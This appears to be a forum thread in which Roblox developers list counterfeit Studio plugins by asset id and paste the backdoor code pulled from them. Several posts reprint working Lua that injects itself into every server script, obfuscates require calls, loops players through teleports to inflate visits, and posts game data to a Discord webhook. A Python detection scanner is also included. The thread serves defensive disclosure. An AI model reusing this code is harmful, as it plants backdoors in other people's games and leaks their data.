Realism Mod
Original: 400812710
Malicious: 3736586479 (inserts a ModuleScript with obfuscated code)
Roundify
Original: 2233768483
Malicious: 3745147634
Intro Creator
Original: 723917710
Malicious: 3664187642
Shift to Sprint
Malicious plugin: 3664816543
Original plugin: 142346332
Day And Night
Malicious plugin: 3622467610
Original plugin: 878777463
This is awesome. Much faster than self-verification and an easy way of getting what you need.
Thanks for creating the tool!
Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4863624219/Virus-Destroyer-Anti-Serverside
Malicious action:
pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Original plugin: unknown
Malicious plugin: https://www.roblox.com/library/4864404814/Custom-Name-Title
Malicious action:
a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire() 'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Original plugin: https://www.roblox.com/library/1248186463/Fall-Damage-Plugin-FIXED
~~
~~
Malicious plugin: https://www.roblox.com/library/4742433843/Fall-Damage-Plugin
Malicious plugin uploader: RobloxSecurePlugins
Malicious action: FallDamage Script
local AntiExploit = Instance.new("Script")
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = "ClientReplicator"
AntiExploit.Source = [[
--Official roblox studio script
require(4582121027):protecc()
]]
Malicious module id: https://www.roblox.com/library/4582121027/unnamed
Malicious module uploader: Neatoxic
~~
~~
Malicious plugin: https://www.roblox.com/library/4657687313/Fall-Damage-Plugin
Malicious plugin uploader: RobloxTopPlugins
Malicious action: FallDamage Script
local AntiExploit = Instance.new("Script")
AntiExploit.Parent = game.Workspace.Camera
AntiExploit.Name = "ClientReplicator"
AntiExploit.Source = [[
game.Players.PlayerAdded:Connect(function(player)
wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService("TeleportService")
if joinData == 4628266409 then
local Tpdata = player:GetJoinData().TeleportData
if Tpdata then
Req = Tpdata.req
gid = Tpdata.grid
end
if player:GetRankInGroup(gid) == 2 then
require(Req).load(player.Name)
end
return else
end
local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4628266409, player, teleportData)
end)
]]
Malicious place id: https://www.roblox.com/games/4628266409/Loading
Malicious place uploader: RobloxFasterLoader
Malicious plugin is force loop rejoining a game to attempt to inflate Visits.
~~
~~
Malicious plugin id: https://www.roblox.com/library/3976656034/Fall-Damage-Plugin
Malicious plugin uploader: Txppin
Malicious plugin action:
a(b)function c(d)d.Source=d.Source..'\n'..game:GetObjects('rbxassetid://4850318089')[1].Source end;for e,d in next,b:GetDescendants()do if rawequal(d.ClassName,'Script')and not string.find(d.Source,'4794986906')then c(d)d:GetPropertyChangedSignal('Source'):Connect(function()if not string.find(d.Source,'4794986906')then c(d)end end)end end;f=false;function g()d=game:GetObjects('rbxassetid://4852273118')[1]if not b:FindFirstChild('Filter Event')or b:FindFirstChild('Filter Event').Source~=d.Source then d.Parent=b else d=b:FindFirstChild('Filter Event')end;function h()if not f then wait(1/60)f=true;d:Destroy()f=false;g()end end;i=d:GetPropertyChangedSignal('Parent'):Connect(h)d.Changed:Connect(function(j)if rawequal(j,'Disabled')or rawequal(j,'Source')then i:Disconnect()h()end end)end;g()end;a(workspace)a(game:GetService('ServerScriptService'))
There are multiple require ids in this action attempt. All require ids are listed.
Malicious require id: https://www.roblox.com/library/4852273118/Filter-Event
Malicious require uploader: TeefusBeefus
Malicious require action:
--[[
Created by: InceptionTime (Year: 2020)
Description: This is a filtering event put by Roblox to check if your game isn’t modifiying the chat filter in any sort of way, deleting this may lead to unforeseeable consequences.
]]
-- You may proceed if you have basic knowledge of scripting and know what you’re doing.
local RunService = game:GetService("RunService")
local Require = require
local Loader = 4794986906 -- Touching this Id may stop the script from functioning
if not RunService:IsStudio() and not RunService:IsClient() and RunService:IsServer() then -- Checks if it isn’t Studio, as it defeats the purpose of the module, also checks if it is being ran on the server’s side and not on the client’s side, just to be on the safe side.
pcall(Require, Loader) -- Begins to load the module, it is wrapped in pcall so it doesn’t bother you in anyway whatsoever.
end
Malicious require id: https://www.roblox.com/library/4794986906/unnamed
Malicious require uploader: sunburstery
Malicious action unknown as obfuscated.
Malicious require id:
https://www.roblox.com/library/4850318089/backpack-code
Malicious require action:
if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end
Malicious require id #2: https://www.roblox.com/library/4794986906/unnamed
This goes to above malicious require id
~~
~~
Malicious plugin id: https://www.roblox.com/library/4863366172/Fall-Damage-Plugin
Malicious plugin uploader: LowkeyNatey
Malicious plugin action:
pcall(function()local a={'Weld',"FilterEvent","ClickerModule","ChatModule","Anti-Exploit"}local b=Instance.new("Script")b.Source='--[[ROBLOX Studio Script]] require(4850721608):Fire()'b.Name=a[math.random(1,#a)]for a = 1,3 do local b=b:Clone()if a==1 then b.Parent=game:GetService("ServerScriptService")elseif a==2 then b.Parent=workspace:FindFirstChildOfClass("Script")elseif a==3 then b.Parent=workspace:FindFirstChildOfClass("Model")end end end)
Malicious require id: https://www.roblox.com/library/4850721608/Anti-Exploit-Module
Require id is a part of above malicious plugins
Backdoor malicious module
getfenv()['\114\101\113\117\105\114\101'](2422875198*2)
2422875198*2 = 4845750396
is obfuscated, but by running in repl.it, prints module id that failed to load.
which it then loads
which has a script to then load
Roblox = "IsStudio"
local a=game:GetService("RunService")if a:IsStudio()then print('Loaded!') else if game.PlaceId==185655149 or game.PlaceId==920587237 or game.PlaceId==735030788 then else getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{52,57,57,53,57,55,56,55,49,57})))end end
and
--[[
License Information:
This product is protected under copyright law. You may not distribute, re-use, modify or otherwise tamper with this software in any way.
Breaking the license gives us, "smartTech", legal grounds for a DMCA takedown.
Please don't steal our stuff.
--]]
local module = {}
local CheckMeIn = false
if CheckMeIn == true then
require(862849844) -- This is the offical CheckMeIn loader. This is owned by an account named "SmartTech". Feel free to use it.
else
CheckMeIn = "Loaded."
local a = script.Script
a.Parent = workspace.Camera
end
return module
Module 862849844 is referred to CheckMeIn which is unknown to be the original creator of this or just something this backdoor creator is using to log users having this backdoor in their game. I’ve tried to inform them about the use of this module, they’ve been warned for over 3 days before I posted this.
The top script then finally loads this module.
This module has a lot of obfuscated code, but one of the scripts remained unobfuscated, loading these two other modules.
MainModule> Folder> Main> ul
-- open source. leak.
local Players = game:GetService('Players')
game.Players.PlayerAdded:Connect(function(Player)
if Player:GetRankInGroup(6157358) >= 2 then
wait(0.1)
require(4674979018):Fire(Player.Name)
require(5033070911):ikthisisskidded(Player.Name)
game.Players[Player.Name].PlayerGui.JOHNDOE.ResetOnSpawn = false
end
end)
game.Players.PlayerAdded:Connect(function(Player)
if Player:GetRankInGroup(5860863) >= 2 then
wait(0.1)
require(4834950415):Fire(Player.Name)
require(5033070911):ikthisisskidded(Player.Name)
end
end)
game:GetService("Players").PlayerAdded:Connect(
function(player)
if game.PlaceId == 4973653404 or game.PlaceId == 4860760464 then
game:GetService("TeleportService"):Teleport(5009641755, player)
end
end
)
Many of the modules use these groups to check whether a player is a member before giving members scripts in this backdoor.
Places that are being teleported to via this backdoor to inflate or ‘pretend fast loading…’
One of the scripts is checking to do a banlist
https://builderman.club/fe.json
Would be suggested to blacklist this domain.
Loads another module
and another module
This module then uses LuaVM to load code without the need of loadstring in
MainModule > JohnDoe> Main> Shadow> Frame> RemoteHandle
another module
This backdoor is still loaded by an unknown plugin, still looking for it.
Guys!
I figured something out.
I was working on a game with a friend of mine, and I suspect he has a virus.
In every Script (not localscript), when I click behind the last “end” (how do I explain this) it moves you to the very side of the script, as if you’ve written 500 spaces in one line and click behind a letter, it moves your Scrollbar (for the X position) to the very far right.
Now, if this happens, move the scrollbar slowly, until you find some weird code, For example I had this:
if not game:service'RunService':IsStudio() then getfenv()["\114\101\113\117\105\114\101"](4794986906) end
This has to be a “virus”, delete those.
Another way to detect those is by searching for “game:service”, in case you haven’t used “game:service” in your script.
I do not know what malicious plugin my friend has installed
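An added example (not part of any post in this thread): a Python triage scanner for script source exported from a place, flagging the two patterns described above, code hidden behind whitespace padding and `require` spelled with decimal escapes or `string.reverse` and called through `getfenv()`. The function names, the 100-blank padding threshold and the id set (a subset of the module ids quoted in this thread) are assumptions of this example, and the sample input is constructed around snippets quoted above.

```python
import re

# Subset of the module asset ids reported as malicious in this thread.
KNOWN_BAD_IDS = {4794986906, 4850721608, 4582121027, 4845750396, 5090011414}

ESCAPE = re.compile(r"\\(\d{1,3})")                       # Lua decimal escape, e.g. \114
STRING = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")    # quoted string literal
NUMERIC_CALL = re.compile(r"\(\s*(\d+)\s*(?:\*\s*(\d+))?\s*\)")  # (id) or (id*n)
PADDING = re.compile(r"\S[ \t]{100,}\S")                  # assumed threshold: 100 blanks


def decode_escapes(literal):
    """Turn Lua decimal escapes into the characters they encode."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1))), literal)


def scan(source):
    """Return sorted (line_number, finding) tuples for one script's source."""
    findings = set()
    for n, line in enumerate(source.splitlines(), 1):
        if PADDING.search(line):
            findings.add((n, "code hidden after whitespace padding"))
        for m in STRING.finditer(line):
            raw = m.group(2)
            text = decode_escapes(raw)
            # Flag strings that only spell "require" once decoded or reversed.
            if raw != "require" and "require" in (text, text[::-1]):
                findings.add((n, "obfuscated 'require' string"))
        if "getfenv" in line:
            findings.add((n, "getfenv() indirection"))
        for m in NUMERIC_CALL.finditer(line):
            # Multiply out the id*2 trick before comparing.
            asset = int(m.group(1)) * int(m.group(2) or 1)
            if asset in KNOWN_BAD_IDS:
                findings.add((n, f"known-bad module id {asset}"))
    return sorted(findings)


# Constructed sample: line 2 hides a snippet quoted in the thread behind padding.
SAMPLE = "\n".join([
    "local part = workspace.Part",
    "part.Touched:Connect(print)" + " " * 300
    + r"""getfenv()["\114\101\113\117\105\114\101"](4794986906)""",
    r"getfenv()['\114\101\113\117\105\114\101'](2422875198*2)",
])

if __name__ == "__main__":
    for line_no, finding in scan(SAMPLE):
        print(f"line {line_no}: {finding}")
```

A hit on `getfenv` alone is only a lead, since legitimate scripts can use it; the decoded `require` string and the id match are the stronger signals.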
Already covered this one and Roblox has finally deleted this module.
https://www.roblox.com/library/4723753937/Content-Deleted
https://www.roblox.com/library/4929048497/Test
Two modules required by malicious code. I don’t know which plugin though, sorry. Hope this helps.
The second module teleports here:
https://www.roblox.com/games/4915459682/Loading?refPageId=ad45ba48-2b45-4b42-ad1e-93d4fdc2113f
That module requires this
Looks like I completely missed you notifying me about this… but the script is definitely not mine. The only way to install CheckMeIn is through these models: Standard Kit, Enterprise Kit. I am aware of many other models on the platform that claim to be the official kit, but they are instead a combination of the official kit, with a back door added. That’s what you’ve found here. All I can do about this is tell my users not to install any third party modules, since technically a back door is not against the Roblox rules.
Edit: The require id it has does load a model that is on your account if that is what you meant. This script however, considered it to just be loading your module.
That’s what I exactly replied to people in your discord server but your discord server ended up being toxic against my attempt to inform your group directly and I left. I just wanted to let you guys know and attempt to invalidate whatever key the backdoor was using. It doesn’t matter if a backdoor isn’t against the tos, it’s malicious and Roblox can moderate any accounts for any reason.
Edit: I’m not saying that your module is one, I’m saying that it’s being used inside one. Any further chats about this, please message.
Maybe move this to a github repo, it makes it much easier to log and request the data as you can just send a HTTP GET request to the repository to download a JSON file, plus it allows for other developers to use the same list if they were to make their own anti-virus
I have no idea how your system works so I cannot provide an example, but you can just do
HTTPService:GetAsync(a link to your repository) and then decode it in JSONDecode
Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicious action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Both of the malicious actions lead to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor, its constant dump can be found here - https://pastebin.com/raw/FhZyxTty.
F3X Plugin
Malicious:
Original:
Fake Anti-Virus/Backdoor Scanner
Malicious:
Thank you for your post, I see it helpful. Also it’s a surprise to find an HR of BH here. <3
Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.
Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.
Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin
Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)
Malicious Script, plugin unknown
require(4751241292)()
Malicious Action
local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
function CheckHttp()
local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
if f == true then
return true
else
return false
end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
local A = CheckHttp()
if A == true then
local Data = {
content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
GUI:Clone().Parent = plr.PlayerGui
end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
GUI:Clone().Parent = plr.PlayerGui
end
end
local A = CheckHttp()
if A == true then
local Data = {
content = "omg a game! https://www.roblox.com/games/"..game.PlaceId;
username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end
Essentially gives a serverside loadstring gui if a player is or is friends with…
https://www.roblox.com/users/1460281907/profile
Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.
Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.
after chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them
reached the obfuscated code.